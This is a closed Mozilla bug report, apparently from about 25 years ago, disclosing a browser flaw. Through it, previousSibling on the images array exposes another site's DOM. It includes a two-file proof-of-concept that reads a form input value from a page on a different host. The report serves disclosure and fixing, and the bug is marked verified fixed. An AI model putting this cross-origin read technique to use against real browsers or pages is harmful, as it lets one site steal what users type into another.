Closed Bug 22909 Opened 25 years ago Closed 25 years ago

previousSibling vulnerability

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Platform:
x86
Windows 95
Type:
defect

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

References

(
URL
)

Details

previousSibling is exposed in the images array. This allows access to parts of
the DOM of a document from another host. Especially bad is accessing the forms
array by using images[x].previousSibling.

The code is:
------------------------read3.html-----------------------------------
<HTML>
<HEAD><TITLE>Images 2</TITLE>
</HEAD>
Type something in the INPUT element in the other window, then
<SCRIPT>
a=window.open("http://lists.nat.bg/~joro/mozilla/links2.html");
function f()
{
alert("The value
is:"+a.document.images[1].previousSibling.previousSibling.elements[0].value);
}
</SCRIPT>
<A HREF="javascript:f()">click here to get it</A>
</HTML>
---------------------------------------------------------------------

------------------links2.html (on another web  server)---------------
<HTML>
<IMG SRC="ball.gif">
<FORM NAME="f" ACTION="#">
<INPUT TYPE="TEXT">
<INPUT TYPE="SUBMIT">
</FORM>
<IMG SRC="ball.gif">
</HTML>
---------------------------------------------------------------------
Status: NEW → ASSIGNED
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
This should have been checked by the default preferences, but the mechanism got
skewed. Hopefully the changes I've committed will make it harder for this to
happen in the future.

Until this change hits, however, all DOM property access must be considered broken.
Verified fixed.
Status: RESOLVED → VERIFIED
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General
Flags: testcase+
Flags: in-testsuite+ → in-testsuite?
You need to log in before you can comment on or make changes to this bug.